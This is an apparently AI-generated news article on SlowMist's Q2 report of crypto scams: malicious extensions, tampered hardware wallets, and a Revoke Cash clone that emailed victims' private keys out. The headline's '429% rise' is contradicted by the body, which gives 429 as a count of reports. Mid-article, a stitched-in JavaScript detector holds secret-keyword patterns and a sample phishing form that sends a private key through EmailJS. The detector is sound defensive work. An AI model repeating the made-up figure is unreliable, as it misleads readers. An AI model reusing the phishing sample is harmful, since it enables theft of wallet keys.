Crypto Users Face 429% Rise in Sophisticated Scams in Q2

Generated by AI Agent | Coin World
Wednesday, Jul 2, 2025 2:36 am ET

Crypto users faced a rise in “psychologically manipulative” attacks in the second quarter as hackers employed advanced and creative methods to steal crypto. According to blockchain security firm SlowMist, while there was no significant advancement in hacking techniques, the scams have become more sophisticated. This shift includes an increase in fake browser extensions, tampered hardware wallets, and social engineering attacks.

One notable trend was the shift from purely onchain attacks to offchain entry points. Attackers now commonly target browser extensions, social media accounts, authentication flows, and user behavior. The psychological manipulation exploits users' trust and sense of urgency, making it easier to get them to share sensitive information or click malicious links.

One emerging attack vector involved malicious browser extensions masquerading as security plugins. For instance, the “Osiris” Chrome extension claimed to detect phishing links and suspicious websites. However, it intercepted all downloads of .exe, .dmg, and .zip files, replacing them with malicious programs. These programs collected sensitive information from the user’s computer, including Chrome browser data and macOS Keychain credentials, giving attackers access to seed phrases, private keys, or login credentials.

Another attack method focused on tricking crypto investors into adopting tampered hardware wallets. Hackers would send users compromised cold wallets, claiming they had won a free device or that their existing device was compromised. In one reported case, a victim lost $6.5 million by purchasing a tampered cold wallet seen on TikTok. Another attacker sold a victim a hardware wallet that the attacker had already pre-activated, allowing the attacker to drain the funds as soon as the new user transferred in their crypto for storage.

Social engineering attacks also played a significant role. SlowMist was contacted by a user who could not revoke a “risky authorization” in their wallet. Upon investigation, it was found that the website the user was using was a near-perfect clone of the popular Revoke Cash interface. This phishing website used EmailJS to send users’ input, including private keys and addresses, to an attacker’s email inbox. These attacks exploit urgency and trust, prompting users to take hasty actions and share sensitive information.
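A defender triaging a reported page can check its source for the combination described above: a form field asking for a wallet secret together with EmailJS client code. This is an added example, not SlowMist's tooling or code from the phishing site; the pattern list, verdict names and both sample pages are constructed assumptions.

```javascript
// Added example: static heuristic for a page that asks for wallet secrets and
// also loads or calls EmailJS. Patterns and verdict names are assumptions.
const EMAILJS_PATTERNS = [
  { id: "emailjs-api-host", re: /api\.emailjs\.com/i },
  { id: "emailjs-sdk", re: /@emailjs\/browser|emailjs-com/i },
  { id: "emailjs-call", re: /\bemailjs\.(?:init|send|sendForm)\s*\(/ },
];
const SECRET_RE = /private[\s_-]*key|seed[\s_-]*phrase|mnemonic|recovery[\s_-]*phrase/i;

// Return the <input>/<textarea> tags whose attributes mention a wallet secret.
function findSecretPrompts(html) {
  const fields = html.match(/<(?:input|textarea)\b[^>]*>/gi) || [];
  return fields.filter((tag) => SECRET_RE.test(tag));
}

// EmailJS alone is a legitimate form-to-mail service, so it is only reported
// as context; the finding is driven by the page asking for a secret at all.
function scanPageSource(html) {
  const emailjs = EMAILJS_PATTERNS.filter((p) => p.re.test(html)).map((p) => p.id);
  const secretPrompts = findSecretPrompts(html);
  let verdict = "no-finding";
  if (secretPrompts.length > 0) {
    verdict = emailjs.length > 0 ? "secret-prompt-with-emailjs" : "secret-prompt";
  }
  return { verdict, emailjs, secretPrompts };
}

// Constructed sample: a revoke-style form that asks for a private key.
const CLONE_SAMPLE = `
<form id="revoke-form">
  <input name="address" placeholder="Wallet address">
  <textarea name="privateKey" placeholder="Enter private key to revoke"></textarea>
</form>
<script src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
<script>emailjs.sendForm("SERVICE_ID", "TEMPLATE_ID", "#revoke-form");</script>`;

// Constructed sample: an ordinary contact form that happens to use EmailJS.
const CONTACT_SAMPLE = `
<form id="contact"><input name="email"><textarea name="message"></textarea></form>
<script>emailjs.sendForm("SERVICE_ID", "TEMPLATE_ID", "#contact");</script>`;

console.log(scanPageSource(CLONE_SAMPLE).verdict);
console.log(scanPageSource(CONTACT_SAMPLE).verdict);
```

The check is a triage aid only: obfuscated or dynamically loaded scripts will not match these patterns, so a "no-finding" result does not clear a page.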

Other attacks included phishing techniques that exploited EIP-7702, introduced in Ethereum’s latest Pectra upgrade, and a campaign that targeted several WeChat users by gaining control of their accounts. Attackers used WeChat’s account recovery system to impersonate the real owner and scam their contacts with discounted Tether (USDT).

SlowMist’s Q2 data came from 429 stolen fund reports submitted to the firm during the second quarter. The firm said it froze and recovered around $12 million from 11 victims who reported having crypto stolen in Q2. This highlights the increasing sophistication and psychological manipulation tactics used by attackers in the crypto space.
